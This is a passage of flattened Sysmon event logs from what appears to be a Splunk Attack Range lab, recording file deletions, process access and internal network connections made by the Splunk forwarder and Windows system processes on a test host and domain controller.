Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BC5611AD5BF154AE2D438198A6958A0,SHA256=A443A6C5A91EC94804EABE299D4592FAFEC01FF874CF5C7BCD9B1FEE7248D489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.981{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED647231941D92FD4880E3B393BCEDA,SHA256=3911D5B1F17269D98C196C1D971769810FFB02C0DB9D9115B541E89E82C66AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:51.411{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F63005B560E10503653E7CD3AF02D728,SHA256=5944CC7CD2B3F3BEC9C548FA4CA9B99B9F86AE20FD533C51DE0001AF2592E71F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B27-6216-7E05-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1B27-6216-7E05-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.293{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B27-6216-7E05-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:51.294{4F8D34B0-1B27-6216-7E05-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000224037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:52.982{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2025EB01E4DBC75489551E42D6EA6892,SHA256=A5175B6024AC61E03CC862453D34E3C0F7D37165DA3E8CB750BCF1D697105585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:52.428{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D948A6EE6C9C38D1CF02DC47CB5F78A,SHA256=A3C89C3EB806ED4B00930D4E116AE53F4FE99C2D737B872F3ECFD775C74E59B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:52.466{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98D37E8481BDA93443C76561DB9C01B0,SHA256=C47B578CC0512F8CE34A0A57E5E9A49EFD5F2F27A0AE126E72783BA865A4F147,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:50.533{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51825-false10.0.1.12-8000- 23542300x8000000000000000224038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:53.982{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCA8F2F0A8F32B4BD3E971B0879CBE8,SHA256=F6EBF414542B1DE3151DC484CBFB880C3BDC3AEA35501F1FE039365BA97C8B85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:53.443{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49CE564C14E0D767BE96339CEA4F85AC,SHA256=B71C1A52BBCB4E01E75264DF5CA548D97D7A3D5CF6F57748E2EE9885742FCBF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:54.458{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBF98FA8216C3A0C6566883D57E63582,SHA256=AD6D86E5FCCDA8A5CB8B44E703043957709682E4871C2357AFCE4131D1AFAD14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:51.703{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49708-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:55.488{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10722B3010FB3D61BB36F7F10DA092BB,SHA256=E332173DDDC4850F5714F5B885B353AFDC27A914489548F123366432E6991386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:55.217{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B31D2F3ACD9C4907D92841B9CB9CCA3,SHA256=0E26CC783C77DB1E92C1B268682CCDB997B9CCFD1E8FC2A89289B4E99322D942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:56.507{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B41EA94AF76476CBF0FACF17BA53AFE,SHA256=F408A0A2BE7EDF9B6067995237371E332E66915BDE2241EA951A0A23ABAE1DED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:56.389{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CD8FE1113EB6E684D6D761D6A3DEA03,SHA256=FCB8C22CF1AB938D787B828AD32E384EFF86307732EA1C913CD3568CEE7F9617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:57.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=086C4F9A0ECF055B2C8C1AE844C56375,SHA256=CA530CF2EB537C8ECFF5FF5A15FEE9086A280996C712C2919D73D430EDED435E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:57.390{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48BFA46C62965D01117F206C61D039AA,SHA256=7D1F2B66E59201985D9B11B2607EA71844A9E16A99BDA9433BA033C25C3CBB05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:58.483{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C1E63A5511F826466BF87EBA3099ED6,SHA256=A3D70F024F137400AFD44888FFB3A1ED75594C5D7ECA2D6F1E373DB871205633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:58.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=205A6528ABFB64B2DC37FAD98FDC5DE0,SHA256=0439867EBF2123F4BF90502F2865B0E1F9A32ECC86F303974F2034B93B82BCC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:56.489{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51826-false10.0.1.12-8000- 354300x8000000000000000224045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:55.959{4F8D34B0-F11C-6215-1100-000000003902}980C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:20b3:19bc:f5ff:fef0win-host-tcontreras-attack-range-985546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 23542300x8000000000000000224044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:59.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6335F2A7F4DEB9162ECA57B4D1FD380E,SHA256=64BD501CBE1444921D7B084C40EF3BA2A815BD8C38830BA711BFC71C3BEA6BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:59.586{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2D27E702803EC859DE919FECC9155D,SHA256=D391FD650498DE081C92454EBB7E654DBE23B98D271A4090B40075B54F917908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:59.346{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-174MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:57.564{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49709-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000224048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:00.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70FFF1EB22692101C1779C05A46BF6E,SHA256=1068FBBEF225A9098B874B32FBD4943B147E022D9C98BE409DF15728516BAF7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:00.587{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 